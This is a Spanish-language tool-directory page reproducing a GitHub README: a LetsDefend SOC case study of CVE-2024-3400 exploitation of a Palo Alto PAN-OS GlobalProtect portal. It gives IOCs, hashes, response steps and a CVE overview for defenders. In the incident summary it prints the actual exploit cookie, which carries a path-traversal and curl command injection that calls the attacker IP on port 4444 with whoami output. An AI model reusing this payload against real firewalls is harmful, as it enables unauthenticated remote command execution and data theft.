Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
letsdefend-cve2024-3400-case-study — Estrategias de detección, análisis y respuesta para intentos de explotación de CVE-2024-3400 dirigidos a portales GlobalProtect de Palo Alto PAN-OS. Incluye IOCs, patrones de explotación y guía de mitigación. | Kitploit
Herramientas/GitHubGitHub/cyprianatsyor/letsdefend-cve2024-3400-case-study
Gestión de Indicadores de Compromiso (IOC)Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebAnálisis ForenseForensia DigitalComando y ControlInteligencia de AmenazasAprendizaje y Educación

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Respuesta a Incidentes
Análisis de Registros
GitHubcyprianatsyor/letsdefend-cve2024-3400-case-study

letsdefend-cve2024-3400-case-study

Estrategias de detección, análisis y respuesta para intentos de explotación de CVE-2024-3400 dirigidos a portales GlobalProtect de Palo Alto PAN-OS. Incluye IOCs, patrones de explotación y guía de mitigación.

Ver Repositorio
4hace 1 añoAún no revisado
Compartir

letsdefend-cve2024-3400-case-study

Estrategias de detección, análisis y respuesta para los intentos de explotación de CVE-2024-3400 dirigidos a los portales GlobalProtect de Palo Alto PAN-OS. Incluye IOCs, patrones de explotación y guía de mitigación.

Investigación del Incidente CVE-2024-3400

🔍 Resumen

Este repositorio contiene una investigación detallada y un análisis de amenazas de CVE-2024-3400, una vulnerabilidad crítica de inyección de comandos sin autenticación que afecta al software Palo Alto Networks PAN-OS, dirigida específicamente al portal GlobalProtect.

El 18 de abril de 2024, se detectó actividad de explotación contra un firewall PAN-OS interno mediante el endpoint vulnerable /global-protect/login.esp. El atacante utilizó una cookie SESSID manipulada que contenía un comando curl ejecutado con backticks para alcanzar un servidor C2 remoto alojado en 144.172.79.92 (Miami, Florida). El payload del exploit aprovechó ${IFS} para evadir filtros simples y utilizó el directorio de telemetría de PAN-OS para preparar la actividad maliciosa. El firewall respondió con un , lo que indica que el payload probablemente se ejecutó con éxito.

200 OK

Resumen del Incidente

📄 Resumen del Incidente

  • ID del Evento: 249

  • Regla de Detección: SOC274 – Explotación de Inyección de Comandos en PAN-OS

  • Hora del Evento: 18 de abril de 2024, 03:09 AM UTC

  • Nombre de Host: PA-Firewall-01

  • IP de Destino: 172.16.17.139

  • IP de Origen: 144.172.79.92

  • Método de Solicitud: POST

  • Endpoint: /global-protect/login.esp

  • Payload de Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaacurl${IFS}144.172.79.92:4444?user=$(whoami)

  • Hashes Maliciosos:

  • SHA256: 3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac

  • MD5: 0c1554888ce9ed0da1583dbdf7b31651

  • Script Malicioso: update.py (ejecutado usando /usr/bin/python3)

🧠 Inteligencia de Amenazas

Inteligencia de Amenazas

Paso 1: Detección inicial del exploit mediante búsqueda en malpedia

Paso 1 de Investigación

Paso 2: Análisis e investigación del hash

Paso 2 de Investigación

Paso 3: Otra investigación

Paso 3 de Investigación

Paso 4: Investigación de la dirección IP

Paso 4 de Investigación

🧠 Indicadores de Comportamiento

  • Abuso de SESSID para inyección de comandos
  • Uso de ${IFS} para evasión
  • Preparación del payload en /opt/panlogs/tmp/device_telemetry
  • Participación del proceso dt_send posterior a la explotación
  • Devolución de llamada de red a la IP del atacante en el puerto 4444

📄 Evidencia de Registros

Muestra de Registro


🧩 Correlación de Hashes

Coincidencia de Hash


✅ Puntos Obtenidos en LetsDefend

Puntos Clave

🚨 Impacto

  • Ejecución remota de comandos sin autenticación en un dispositivo de seguridad crítico
  • Posible descarga y ejecución de un payload Python controlado por el atacante
  • Abuso de los mecanismos internos de telemetría de PAN-OS para preparación o exfiltración
  • Tráfico permitido desde una IP maliciosa conocida

✅ Acciones de Respuesta Recomendadas

  1. Parchear PAN-OS a las versiones: 10.2.9-h1, 11.0.4-h1 o 11.1.2-h3
  2. Bloquear la IP maliciosa: 144.172.79.92
  3. Buscar Indicadores de Compromiso (IOCs) en registros y sistemas de archivos
  4. Inspeccionar los directorios de telemetría en busca de archivos sospechosos o comportamiento de ejecución
  5. Aislar los sistemas afectados y realizar un análisis forense completo

📁 Contenido

  • logs/: Registros de detección analizados y sin procesar
  • ioc/: Hashes de archivos e IPs asociados con el ataque
  • analysis/: Análisis profundo del comportamiento del exploit y rastreo de procesos
  • report/: Resumen e imágenes de los registros y códigos de mis investigaciones

¿Qué es CVE-2024-3400?

CVE-2024-3400 se refiere a una vulnerabilidad crítica en Palo Alto Networks PAN-OS, que afecta específicamente a las puertas de enlace GlobalProtect. Aquí hay un desglose de lo que se conoce públicamente al respecto:

🔥 CVE-2024-3400 – Vulnerabilidad de Inyección de Comandos en Palo Alto PAN-OS

Puntuación CVSS: 10.0 (Crítica)

Publicado: abril de 2024

Productos Afectados: PAN-OS 10.2, 11.0 y 11.1 cuando GlobalProtect está habilitado.

Explotación: Confirmada en entornos reales (zero-day)

Tipo de Vulnerabilidad: Inyección de comandos sin autenticación

🧠 ¿Cuál es el Riesgo?

CVE-2024-3400 permite a atacantes no autenticados ejecutar comandos arbitrarios en el sistema operativo del firewall. Esto esencialmente otorga control total sobre los dispositivos afectados sin necesidad de credenciales — un punto de compromiso grave para cualquier empresa que dependa de los firewalls de Palo Alto.

⚠️ Condiciones Requeridas para la Explotación:

La puerta de enlace GlobalProtect debe estar habilitada.

Versiones específicas de PAN-OS (10.2.x, 11.0.x, 11.1.x).

Explotable a través de internet si no está detrás de capas de seguridad adicionales.

🔎 ¿Qué Están Haciendo los Atacantes?

Envío de solicitudes manipuladas para explotar la falla de inyección.

Despliegue de shells remotas o descarga de payloads de segunda etapa.

El comportamiento observado incluye:

Ejecución de comandos mediante URL manipuladas

Mecanismos de persistencia

Movimiento lateral dentro de las redes

🛡️ Mitigación y Recomendaciones:

Parchear de inmediato: Palo Alto publicó correcciones; actualice a versiones no vulnerables (p. ej., 10.2.9-h1, 11.0.4-h1, 11.1.2-h3 o posteriores).

Busque Indicadores de Compromiso (IOCs) como procesos sospechosos, conexiones salientes o historial inusual de CLI.

Utilice herramientas como Shodan o inventarios de activos para encontrar dispositivos vulnerables.

🛠️ Cómo Investigar (p. ej., mediante LetsDefend o SIEM):

Busque IPs externas que accedan a GlobalProtect sin autenticación válida.

Compruebe la ejecución de comandos sospechosos en los registros (show system processes, cat /etc/passwd, etc.).

Supervise el comportamiento del firewall y alerte sobre conexiones salientes anómalas.

Este repositorio sirve tanto como informe de investigación interno como recurso educativo para defensores que buscan comprender la explotación real de las vulnerabilidades de PAN-OS. Las contribuciones y observaciones adicionales son bienvenidas.

Descargar herramienta